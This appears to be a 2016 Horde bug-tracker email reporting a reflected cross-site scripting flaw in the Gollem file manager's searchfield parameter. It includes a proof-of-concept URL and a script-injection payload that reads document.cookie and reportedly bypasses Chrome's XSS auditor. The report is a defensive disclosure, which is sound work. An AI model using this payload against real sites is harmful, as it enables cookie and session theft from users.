[Tickets #14213] Reflected Cross-Site Scripting (XSS)
noreply at bugs.horde.org
noreply at bugs.horde.org
Sun Jan 3 01:19:19 UTC 2016
DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.
Ticket URL: https://bugs.horde.org/ticket/14213
------------------------------------------------------------------------------
Ticket | 14213
Created By | duarteetraud at gmail.com
Summary | Reflected Cross-Site Scripting (XSS)
Queue | Gollem
Version | Git master
Type | Bug
State | Unconfirmed
Priority | 3. High
Milestone |
Patch |
Owners |
------------------------------------------------------------------------------
duarteetraud at gmail.com (2016-01-03 01:19) wrote:
Hey guys,
I've found a XSS flaw on a gollem in Horde (5.2.5) application that's
being used has a plugin in roundecube for file management, I only
tried in prod.
[domain]xplorer/gollem/manager.php?searchfield=%22%22%3E%3Cscript/src=data:,alert(document.cookie)%2b%22&x=0&y=0
Variable: searchfield
The payload: ""><script/src=data:,alert(document.cookie)%2b" (With
Chrome XSS-Auditor bypass)
Input validation in the search field should be enough to stop the attack.
I can post on the bug mailist if you want.
Thank You.
More information about the bugs
mailing list